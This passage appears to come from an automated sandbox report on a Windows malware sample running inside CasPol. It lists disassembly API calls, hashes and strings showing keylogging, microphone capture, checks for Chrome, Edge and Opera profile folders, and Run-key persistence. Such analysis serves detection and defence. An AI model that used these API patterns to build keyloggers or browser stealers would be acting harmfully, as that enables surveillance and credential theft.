                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                          • String ID: Online Keylogger Stopped
                                                                                                                                                                          • API String ID: 1623830855-1496645233
                                                                                                                                                                          • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                                                          • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                                                                          APIs
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                          APIs
                                                                                                                                                                          • waveInPrepareHeader.WINMM(00758E18,00000020,?), ref: 00401849
                                                                                                                                                                          • waveInAddBuffer.WINMM(00758E18,00000020), ref: 0040185F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                          • String ID: hMG
                                                                                                                                                                          • API String ID: 2315374483-350922481
                                                                                                                                                                          • Opcode ID: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
                                                                                                                                                                          • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                                                                                                                                                          • Opcode Fuzzy Hash: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
                                                                                                                                                                          • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocaleValid
                                                                                                                                                                          • String ID: IsValidLocaleName$kKD
                                                                                                                                                                          • API String ID: 1901932003-3269126172
                                                                                                                                                                          • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                                                          • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                          • API String ID: 1174141254-4188645398
                                                                                                                                                                          • Opcode ID: 2b6c0150b8fccbbffc8f0b3b989992b7109110bbcbfb9973898c57e16d168baa
                                                                                                                                                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6c0150b8fccbbffc8f0b3b989992b7109110bbcbfb9973898c57e16d168baa
                                                                                                                                                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                          • API String ID: 1174141254-2800177040
                                                                                                                                                                          • Opcode ID: be2ac72381ba667652cb8157c7eab32d159168f8a730a51bc7883fbde0610272
                                                                                                                                                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                                                          • Opcode Fuzzy Hash: be2ac72381ba667652cb8157c7eab32d159168f8a730a51bc7883fbde0610272
                                                                                                                                                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                          • API String ID: 1174141254-1629609700
                                                                                                                                                                          • Opcode ID: e9aef06425b09f93b4b18eec61b32618902fb8755f3519ca0ccc41cb67e29c85
                                                                                                                                                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                                                          • Opcode Fuzzy Hash: e9aef06425b09f93b4b18eec61b32618902fb8755f3519ca0ccc41cb67e29c85
                                                                                                                                                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID: vv
                                                                                                                                                                          • API String ID: 269201875-118461835
                                                                                                                                                                          • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                                                                                                          • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                                                                                                                                          • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                                                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                                                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                          • String ID: [AltL]$[AltR]
                                                                                                                                                                          • API String ID: 2738857842-2658077756
                                                                                                                                                                          • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                                                          • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                          • String ID: !D@$open
                                                                                                                                                                          • API String ID: 587946157-1586967515
                                                                                                                                                                          • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State
                                                                                                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                          • API String ID: 1649606143-2446555240
                                                                                                                                                                          • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                          • String ID: <kG$@kG
                                                                                                                                                                          • API String ID: 1881088180-1261746286
                                                                                                                                                                          • Opcode ID: 225a41fd0d315e7b14745aeefdffd8a249a85d76d0a8159229783941359da412
                                                                                                                                                                          • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                                                                                                                                                          • Opcode Fuzzy Hash: 225a41fd0d315e7b14745aeefdffd8a249a85d76d0a8159229783941359da412
                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteOpenValue
                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                          • API String ID: 2654517830-1051519024
                                                                                                                                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 3325800564-4028850238
                                                                                                                                                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 1872346434-4028850238
                                                                                                                                                                          • Opcode ID: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                                                                                                                                                          • Instruction ID: 4cc810616d40180dbd1e9271652f71629269b6e9fac0605c61d014a2f2010889
                                                                                                                                                                          • Opcode Fuzzy Hash: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                                                                                                                                                          • Instruction Fuzzy Hash: B0D0C934189712EBD7220B70AE49B443A6CA705322F141360F429413F1C6A98894AA18
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4100373531-0
                                                                                                                                                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:5.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:69
